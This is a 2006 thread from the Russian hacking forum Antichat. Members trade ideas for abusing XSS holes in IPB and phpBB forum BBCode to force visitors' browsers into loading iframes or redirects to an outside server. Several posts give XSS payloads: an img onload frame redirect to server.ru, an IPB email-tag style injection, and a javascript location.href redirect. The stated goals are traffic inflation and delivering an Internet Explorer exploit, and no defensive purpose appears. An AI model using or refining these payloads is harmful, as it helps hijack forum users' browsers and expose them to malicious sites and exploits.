Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   iframe вместо ссылки на снифер (https://forum.antichat.xyz/showthread.php?t=12769)

ilyha 10.01.2006 21:20

iframe вместо ссылки на снифер
 
Вот возникла идея, а можно ли, изменить XSS BB код того же IPB или PHPBB таким образом, чтобы не куки воровать, а вместо ссылки на снифер браузером открывшего страницу юзера обрабатывался iframe тег, ну и соответственно открывалась страничка в этом ifram'е. Советы и примеры принимаются в любых колличествах :))

Romaxa55 11.01.2006 06:04

Мде, это уже называется раскрутка, да конечно возможно))) Нужно посидеть подумать может чтонить придумаю!

censored! 11.01.2006 12:34

Можно. А какие советы или примеры тебе нужны?

ilyha 11.01.2006 21:45

Да, было бы неплохо, хотя бы один примерчик :))

censored! 11.01.2006 23:34

Цитата:

Сообщение от ilyha
Да, было бы неплохо, хотя бы один примерчик :))

Нет уж. Давай-ка лучше сам спрашивай, а мы поможем (точнее - подскажем, точнее - намекнем).

mixas 15.01.2006 16:43

Столкнулся с той же проблемой.
Например срабатывает такое XSS:
Код:

<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:

<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">
Но чтобы это сработало, нужно, чтобы страница содержала какой нибудь другой фрейм.
Подскажите, пожалуйста, как это еще можно осуществить.

Cronyal 15.01.2006 16:55

диалер чтоли вставить хочешь?))))

mixas 15.01.2006 18:56

Ну от банальной накрутки посещений до эксплоита под Ie.

max_pain89 15.01.2006 19:07

не совсем уверен про что ты говоришь, но поробуй прочитать http://antichat.ru/txt/hmail/ про mail.ru, там как раз фрейм

WizART 15.01.2006 20:18

код не image а img вроде, насколько я знаю :D насчет данного способа - мне не нравиться :)
И вообще, если тебе надо сделать два фрейма, так и сделай их... в одном будет то что тебе надо в другом прежний контент страницы ;)

ilyha 16.01.2006 03:12

Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....

bul666 16.01.2006 03:59

Цитата:

Сообщение от mixas
Код:

<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:

<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">

А не легче : <img src="javascript:alert()">

bul666 16.01.2006 04:02

Цитата:

Сообщение от ilyha
Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....

ЁМОЁ!!! ))))

Береш сплоит... Находишь строчки кода HTML и меняешь их... На нужные...
Дай сплоит помогу ))))

ilyha 16.01.2006 05:07

Вот это, если не ошибаюсь XSS для последней или предпоследней версии IPB.
Код:

[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javaSCript:alert(/wj/))`

bul666 16.01.2006 05:15

Попробуй так... Хотя конечно может и не сработать ))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т УТ НУЖНЫЙ ТЕБЕ КОД))`

WizART 16.01.2006 20:13

сильно наврят-ли :))) вы че, сами то смотрите,че пишете?))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т У Т НУЖНЫЙ ТЕБЕ КОД))`
ага... почему ` уже после ББ кода? Не тот код, если я не ошибаюсь!

ilyha 16.01.2006 21:56

даа, че-то не работает. Блин, надо пытаться, я думаю многим будет полезен результат ;)

mixas 16.01.2006 21:57

тэги типа
Код:

<iframe>
и другие в скобках не каждый форум пропустит, надо как то без них. Можно конечно просто сделать переадресацию типа
Код:

javascript:location.href='http://server.ru'
но это не то.

WizART, а что ты имел ввиду по поводу создания фрейма? Как его возможно сделать, когда теги фильтруются?

bul666 17.01.2006 03:12

А вы вообще уверены, что сплоит рабочий?

mixas 17.01.2006 19:00

Цитата:

Сообщение от bul666
А вы вообще уверены, что сплоит рабочий?

А причем здесь сплоит? Вопрос в том как вставить фрейм без тэгов в скобках.

0verfe1 19.01.2006 11:28

интересует аналогичный вопрос =)))
mixas чувстую мы на одну цель работаем... =)))

karapuz 06.02.2006 23:16

так как умы форума додумались? интерестно услышать було б данную реализацию кода.


Время: 13:56